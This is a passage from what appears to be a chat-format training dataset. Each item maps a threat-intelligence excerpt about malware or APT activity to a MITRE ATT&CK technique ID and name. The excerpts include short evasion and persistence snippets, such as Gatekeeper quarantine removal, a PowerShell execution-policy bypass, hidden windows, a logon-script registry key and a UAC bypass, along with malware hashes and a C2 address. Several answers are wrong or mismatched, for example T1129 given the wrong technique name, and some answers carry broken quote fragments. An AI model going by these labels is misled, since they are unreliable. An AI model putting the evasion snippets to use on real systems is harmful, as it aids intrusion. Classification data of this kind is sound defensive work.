- "content": "When you run the command, it sets all the required information about the AD FS to Azure AD for the federated domain. It also creates a relying party trust for the Azure AD to the local AD FS server. When a user is authenticated on AD FS, it creates a security token including claims about the user’s identity. With Azure AD, two claims are used for authentication; UserPrincipalName and ImmutabledId. Basically, the ImmutableId could be any string, as long as it matches the ImmutableId attribute of the user object in Azure AD. Typically the ImmutableId is a base 64 encoded GUID of the user object in on-premises AD (to convert GUID to immutable ID see the tools page). Converting the domain to federated also creates two claim issuance rules. For short, the rules add the UserPrincipalName and ImmutableId claims of the logged in user to the security token. When security token is delivered to Azure authentication platform, it checks the token signature, and if it matches the trust, the user is granted access"
- },
- {
- "role": "assistant",
- "content": "T1484 - Domain or Tenant Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats has delivered compressed executables within ZIP files to victims."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D uses the command \"xattr -d com.apple.quarantine\" to remove the quarantine file attribute used by Gatekeeper."
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has a module that can proxy C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the malware was persisted and kicked off the launch items, it invokes a function named create_rescue_executable to create yet another copy of itself. This copy will made in the user’s Library directory. Its named starts with a . so that it won’t show up in the UI (i.e. Finder.app), and is then followed via 9 random characters"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can spawn processes with alternate PPIDs."
- },
- {
- "role": "assistant",
- "content": "T1134.004 - Access Token Manipulation: Parent PID Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle has been distributed via a malicious Word document within a spearphishing email."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession has used a file named English.rtf to appear benign on victim hosts."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes a binary on the system and logs the results into a temp file by using: cmd.exe /c \" > %temp%\\PM* .tmp 2>&1\"."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used Ntdsutil to dump credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used batch scripts to enumerate network information, including information about trusts, zones, and the domain."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter uses EnumServicesStatusExW to enumerate running services on the network."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Various malware enumerates logged-on users."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Current variants will often drop or retrieve secondary executables to inject into, or they will attempt to inject into known (and vulnerable) binaries already present on targeted hosts"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can create a Startup item for persistence if it determines it is on a Windows system."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's dispatcher can execute additional plugins by loading the respective DLLs."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files."
- },
- {
- "role": "assistant",
- "content": "T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can use HTTP or HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries"
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account', 'T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can use WMI to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename The_Four_Traps_for_China.doc File Size 4428595 bytes MD5 7659c41a30976d523bb0fbb8cde49094 SHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"Uploader\" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2 Code that issues DNS query to gogle.co if a debugger is detected All DNS requests issued by RogueRobin use the built in nslookup.exe application to communicate to the C2 server and the Trojan will use a variety of regular expressions to extract data from the DNS response"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos can remove all command history on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D can run commands through a terminal on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used Remote Desktop Protocol to conduct lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ConnectWise can be used to execute PowerShell commands on target machines."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon bypasses UAC using the CMSTPLUA COM interface."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can download additional malware from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell has been copied over network shares to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can use process hollowing to inject one of its trojans into another process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs service discovery using net start commands."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gorgon Group has used \"-W Hidden\" to conceal PowerShell windows by setting the WindowStyle parameter to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "configured its payload to inject into the rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program."
- },
- {
- "role": "assistant",
- "content": "T1036.006 - Masquerading: Space after Filename"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy performs persistence with a logon script via adding to the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\"."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C&C communication, POLONIUM abuses common cloud services such as Dropbox, OneDrive, and Mega."
- },
- {
- "role": "assistant",
- "content": "T1136.003 - Create Account: Cloud Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT uses WMI to query the Windows Registry."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group malware has collected Microsoft Office documents from mapped network drives."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT19 HTTP malware variant decrypts strings using single-byte XOR keys."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has infected victims by tricking them into visiting compromised watering hole websites."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "operates over ports 21 and 20."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar has used compromised WordPress blogs as C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An official website of the United States government . Here’s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you’ve safely connected to the .gov website. O’Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China’s intelligence service access to sensitive business information,” said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer’s operating system. Such malware enabled members of the APT10 Group to monitor victims’ computers remotely and steal user credentials"
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has queried the Registry to identify victim information."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module for enumerating TCP and UDP network connections and associated processes using the \"netstat\" command."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adbupd can run a copy of cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains code to delete files from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it"
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor’s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the ‘Winnti umbrella and linked groups’, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs"
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has used .PNG images within a zip file to build the executable."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo can send the data it collects to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along with the JavaScript RAT, DarkWatchman features a C# keylogger. The keylogger is distributed as obfuscated C# source code that is processed and stored in the registry as a Base64-encoded PowerShell command. When the RAT is launched, it executes this PowerShell script which, in turn, compiles the keylogger (using CSC) and executes it. Instead, it writes it’s keylog to a registry key that it uses as a buffer"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1574.013 - KernelCallbackTable', 'T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While analyzing this intrusion, we observed further persistence via scheduled tasks associated with post-exploitation activities.. . This scheduled task with name HpSupport executed a Cobalt Strike Beacon kaslose64.dll both on the Domain Controller and the File Server:"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete malware used Python’s urllib library to make HTTP requests to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2)."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
